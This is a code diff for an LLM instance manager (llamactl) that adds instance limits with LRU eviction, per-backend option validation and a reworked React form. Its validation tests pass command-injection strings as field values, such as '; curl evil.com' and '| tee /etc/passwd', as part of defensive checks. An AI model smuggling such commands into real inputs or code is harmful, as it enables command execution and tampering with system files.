func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -272,6 +272,12 @@ func (h *Handler) StartInstance() http.HandlerFunc {
inst, err := h.InstanceManager.StartInstance(name) inst, err := h.InstanceManager.StartInstance(name)
if err != nil { if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -451,7 +457,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return return
} }
if !inst.Running { if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return return
} }
@@ -574,24 +580,37 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return return
} }
if !inst.Running { if !inst.IsRunning() {
if inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart { allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
// If on-demand start is enabled, start the instance if !allowOnDemand {
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} else {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return return
} }
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} }
proxy, err := inst.GetProxy() proxy, err := inst.GetProxy()

View File

@@ -2,6 +2,7 @@ package validation
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"reflect" "reflect"
"regexp" "regexp"
@@ -33,20 +34,35 @@ func validateStringForInjection(value string) error {
return nil return nil
} }
// ValidateInstanceOptions performs minimal security validation // ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error { func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil { if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil")) return ValidationError(fmt.Errorf("options cannot be nil"))
} }
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns // Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil { if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err return err
} }
// Basic network validation - only check for reasonable ranges // Basic network validation for port
if options.Port < 0 || options.Port > 65535 { if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range")) return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
} }
return nil return nil

View File

@@ -1,6 +1,7 @@
package validation_test package validation_test
import ( import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"llamactl/pkg/testutil" "llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port, Port: tt.port,
}, },
} }
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field) // Test with Model field (string field)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value, Model: tt.value,
}, },
} }
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field) // Test with Lora field (array field)
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array, Lora: tt.array,
}, },
} }
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{ {
name: "injection in model field", name: "injection in model field",
options: &instance.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf", Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com", HFRepo: "microsoft/model; curl evil.com",
}, },
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{ {
name: "injection in log file", name: "injection in log file",
options: &instance.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf", Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd", LogFile: "/tmp/log.txt | tee /etc/passwd",
}, },
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{ {
name: "all safe fields", name: "all safe fields",
options: &instance.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium", HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log", LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
AutoRestart: testutil.BoolPtr(true), AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5), MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10), RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080, Port: 8080,
GPULayers: 32, GPULayers: 32,
CtxSize: 4096, CtxSize: 4096,

View File

@@ -30,9 +30,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => { const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) { if (editingInstance) {
updateInstance(editingInstance.name, options); void updateInstance(editingInstance.name, options);
} else { } else {
createInstance(name, options); void createInstance(name, options);
} }
}; };

View File

@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext' import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext' import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API // Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => { describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } }, { name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } } { name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
] ]
beforeEach(() => { beforeEach(() => {
@@ -81,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup() const user = userEvent.setup()
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-test-instance', name: 'new-test-instance',
running: false, status: 'stopped',
options: { model: 'new-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
} }
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -105,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', { expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -118,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup() const user = userEvent.setup()
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: 'test-instance-1', name: 'test-instance-1',
running: false, status: 'stopped',
options: { model: 'updated-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
} }
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance) vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -138,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data // Verify correct API call with existing instance data
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', { expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
}) })
}) })
}) })

View File

@@ -0,0 +1,123 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { BackendOptions } from '@/schemas/instanceOptions'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface BackendFormFieldProps {
fieldKey: keyof BackendOptions
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
switch (fieldType) {
case 'boolean':
return (
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
{config.label}
{config.description && (
<span className="text-muted-foreground ml-1">- {config.description}</span>
)}
</Label>
</div>
)
case 'number':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
case 'array':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => {
const arrayValue = e.target.value
? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
: undefined
handleChange(arrayValue)
}}
placeholder="item1, item2, item3"
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
case 'text':
default:
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
}
return <div className="space-y-2">{renderField()}</div>
}
export default BackendFormField

View File

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />; return <XCircle className="h-3 w-3" />;
case "unknown": case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />; return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
} }
}; };
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive"; return "destructive";
case "unknown": case "unknown":
return "secondary"; return "secondary";
case "failed":
return "destructive";
} }
}; };
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error"; return "Error";
case "unknown": case "unknown":
return "Unknown"; return "Unknown";
case "failed":
return "Failed";
} }
}; };

View File

@@ -24,7 +24,7 @@ function InstanceCard({
editInstance, editInstance,
}: InstanceCardProps) { }: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false); const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.running); const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => { const handleStart = () => {
startInstance(instance.name); startInstance(instance.name);
@@ -50,13 +50,15 @@ function InstanceCard({
setIsLogsOpen(true); setIsLogsOpen(true);
}; };
const running = instance.status === "running";
return ( return (
<> <>
<Card> <Card>
<CardHeader className="pb-3"> <CardHeader className="pb-3">
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle> <CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />} {running && <HealthBadge health={health} />}
</div> </div>
</CardHeader> </CardHeader>
@@ -66,7 +68,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStart} onClick={handleStart}
disabled={instance.running} disabled={running}
title="Start instance" title="Start instance"
data-testid="start-instance-button" data-testid="start-instance-button"
> >
@@ -77,7 +79,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStop} onClick={handleStop}
disabled={!instance.running} disabled={!running}
title="Stop instance" title="Stop instance"
data-testid="stop-instance-button" data-testid="stop-instance-button"
> >
@@ -108,7 +110,7 @@ function InstanceCard({
size="sm" size="sm"
variant="destructive" variant="destructive"
onClick={handleDelete} onClick={handleDelete}
disabled={instance.running} disabled={running}
title="Delete instance" title="Delete instance"
data-testid="delete-instance-button" data-testid="delete-instance-button"
> >
@@ -122,7 +124,7 @@ function InstanceCard({
open={isLogsOpen} open={isLogsOpen}
onOpenChange={setIsLogsOpen} onOpenChange={setIsLogsOpen}
instanceName={instance.name} instanceName={instance.name}
isRunning={instance.running} isRunning={running}
/> />
</> </>
); );

View File

@@ -10,10 +10,11 @@ import {
DialogHeader, DialogHeader,
DialogTitle, DialogTitle,
} from "@/components/ui/dialog"; } from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance"; import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils"; import { getBasicFields, getAdvancedFields, getBasicBackendFields, getAdvancedBackendFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react"; import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField"; import ZodFormField from "@/components/ZodFormField";
import BackendFormField from "@/components/BackendFormField";
interface InstanceDialogProps { interface InstanceDialogProps {
open: boolean; open: boolean;
@@ -29,7 +30,6 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance, instance,
}) => { }) => {
const isEditing = !!instance; const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState(""); const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({}); const [formData, setFormData] = useState<CreateInstanceOptions>({});
@@ -39,6 +39,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Get field lists dynamically from the type // Get field lists dynamically from the type
const basicFields = getBasicFields(); const basicFields = getBasicFields();
const advancedFields = getAdvancedFields(); const advancedFields = getAdvancedFields();
const basicBackendFields = getBasicBackendFields();
const advancedBackendFields = getAdvancedBackendFields();
// Reset form when dialog opens/closes or when instance changes // Reset form when dialog opens/closes or when instance changes
useEffect(() => { useEffect(() => {
@@ -52,6 +54,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName(""); setInstanceName("");
setFormData({ setFormData({
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
}); });
} }
setShowAdvanced(false); // Always start with basic view setShowAdvanced(false); // Always start with basic view
@@ -66,6 +70,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
})); }));
}; };
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
},
}));
};
const handleNameChange = (name: string) => { const handleNameChange = (name: string) => {
setInstanceName(name); setInstanceName(name);
// Validate instance name // Validate instance name
@@ -90,7 +104,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields // Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {}; const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => { Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) { if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays // Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) { if (Array.isArray(value) && value.length === 0) {
return; return;
@@ -114,6 +145,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Check if auto_restart is enabled // Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true; const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return ( return (
<Dialog open={open} onOpenChange={onOpenChange}> <Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col"> <DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
@@ -187,8 +228,9 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
(fieldKey) => (fieldKey) =>
fieldKey !== "auto_restart" && fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" && fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay" fieldKey !== "restart_delay" &&
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above fieldKey !== "backend_options" // backend_options is handled separately
)
.map((fieldKey) => ( .map((fieldKey) => (
<ZodFormField <ZodFormField
key={fieldKey} key={fieldKey}
@@ -199,6 +241,21 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
))} ))}
</div> </div>
{/* Backend Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */} {/* Advanced Fields Toggle */}
<div className="border-t pt-4"> <div className="border-t pt-4">
<Button <Button
@@ -217,8 +274,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{ {
advancedFields.filter( advancedFields.filter(
(f) => (f) =>
!["max_restarts", "restart_delay"].includes(f as string) !["max_restarts", "restart_delay", "backend_options"].includes(f as string)
).length ).length + advancedBackendFields.length
}{" "} }{" "}
options) options)
</span> </span>
@@ -228,24 +285,51 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{/* Advanced Fields - Automatically generated from type (excluding restart options) */} {/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && ( {showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted"> <div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4"> {/* Advanced instance fields */}
{advancedFields {advancedFields
.filter( .filter(
(fieldKey) => (fieldKey) =>
!["max_restarts", "restart_delay"].includes( !["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string fieldKey as string
) )
) // Exclude restart options as they're handled above ).length > 0 && (
.sort() <div className="space-y-4">
.map((fieldKey) => ( <h4 className="text-md font-medium">Advanced Instance Configuration</h4>
<ZodFormField {advancedFields
key={fieldKey} .filter(
fieldKey={fieldKey} (fieldKey) =>
value={formData[fieldKey]} !["max_restarts", "restart_delay", "backend_options"].includes(
onChange={handleFieldChange} fieldKey as string
/> )
))} )
</div> .sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={fieldKey === 'backend_options' ? undefined : formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
)}
{/* Advanced backend fields */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
)}
</div> </div>
)} )}
</div> </div>
@@ -264,11 +348,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError} disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button" data-testid="dialog-save-button"
> >
{isEditing {saveButtonLabel}
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
</Button> </Button>
</DialogFooter> </DialogFooter>
</DialogContent> </DialogContent>

View File

@@ -3,6 +3,7 @@ import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label' import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox' import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance' import type { CreateInstanceOptions } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils' import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps { interface ZodFormFieldProps {
@@ -23,6 +24,30 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
} }
const renderField = () => { const renderField = () => {
// Special handling for backend_type field - render as dropdown
if (fieldKey === 'backend_type') {
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<select
id={fieldKey}
value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
onChange={(e) => handleChange(e.target.value || undefined)}
className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
>
<option value={BackendType.LLAMA_CPP}>Llama Server</option>
{/* Add more backend types here as they become available */}
</select>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
switch (fieldType) { switch (fieldType) {
case 'boolean': case 'boolean':
return ( return (

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard' import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here // Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({ vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = { const stoppedInstance: Instance = {
name: 'test-instance', name: 'test-instance',
running: false, status: 'stopped',
options: { model: 'test-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
} }
const runningInstance: Instance = { const runningInstance: Instance = {
name: 'running-instance', name: 'running-instance',
running: true, status: 'running',
options: { model: 'running-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
} }
beforeEach(() => { beforeEach(() => {
@@ -301,7 +302,7 @@ afterEach(() => {
it('handles instance with minimal data', () => { it('handles instance with minimal data', () => {
const minimalInstance: Instance = { const minimalInstance: Instance = {
name: 'minimal', name: 'minimal',
running: false, status: 'stopped',
options: {} options: {}
} }
@@ -323,7 +324,7 @@ afterEach(() => {
it('handles instance with undefined options', () => { it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = { const instanceWithoutOptions: Instance = {
name: 'no-options', name: 'no-options',
running: true, status: 'running',
options: undefined options: undefined
} }

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext' import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext' import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API // Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn() const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'instance-1', running: false, options: { model: 'model1.gguf' } }, { name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', running: true, options: { model: 'model2.gguf' } }, { name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } } { name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
] ]
const DUMMY_API_KEY = 'test-api-key-123' const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog' import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => { describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn() const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
